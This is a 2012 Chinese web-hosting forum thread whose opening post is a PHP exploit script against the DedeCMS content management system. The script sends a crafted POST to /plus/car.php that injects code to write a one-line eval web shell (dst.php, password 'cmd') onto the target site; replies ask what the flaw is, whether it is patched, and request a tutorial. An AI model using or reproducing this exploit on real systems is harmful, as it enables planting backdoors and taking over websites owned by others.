全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

CeraNetworks网络延迟测速工具IP归属甄别会员请立即修改密码
查看: 2727|回复: 10

dede那个漏洞的exp

[复制链接]
发表于 2012-3-24 16:17:52 | 显示全部楼层 |阅读模式
<?php//author:舞林//date  : 2012-03-21 00:31:05//shell一句话地址,/plus/dst.php 密码cmd//www.t.com/dede/plus/car.phperror_reporting(E_ERROR);set_time_limit(0);$url ='www.t.com';//目标站url$dir ='/dede';//dedecms安装目录//$content = '$a=${@phpinfo()};';$content ='$a=${@file_put_contents("dst.php","<?php eval(\$_POST[cmd]); ?>")};';$data = "POST $dir/plus/car.php HTTP/1.1\r\n";$data .= "Host: localhost\r\n";$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";$data .= "Content-Length:        ".strlen($content)."\r\n\r\n";$data .= $content."\r\n";$socket=fsockopen($url,'80');if ($socket) {        fwrite($socket,$data);        while (!feof($socket)) {                $exp.=fgets($socket, 1024);        }        echo $exp;}else{        echo 'socket err';}?>
发表于 2012-3-24 16:20:04 来自手机 | 显示全部楼层
这是啥漏洞?
发表于 2012-3-24 16:23:20 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
发表于 2012-3-24 16:23:47 | 显示全部楼层
新版不知道修复没有呢
发表于 2012-3-24 16:32:09 | 显示全部楼层
看起来很高级的样子
发表于 2012-3-24 16:35:53 | 显示全部楼层
MJJ
发表于 2012-3-24 16:39:37 | 显示全部楼层
这个如何利用,弄个视频教程啊!
发表于 2012-3-24 16:59:16 | 显示全部楼层
可以排版一下吗..
发表于 2012-3-24 17:24:30 | 显示全部楼层
好像无效了
发表于 2012-3-24 17:33:49 | 显示全部楼层
准备抓捕
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|全球主机交流论坛

GMT+8, 2024-6-14 11:47 , Processed in 0.082533 second(s), 11 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表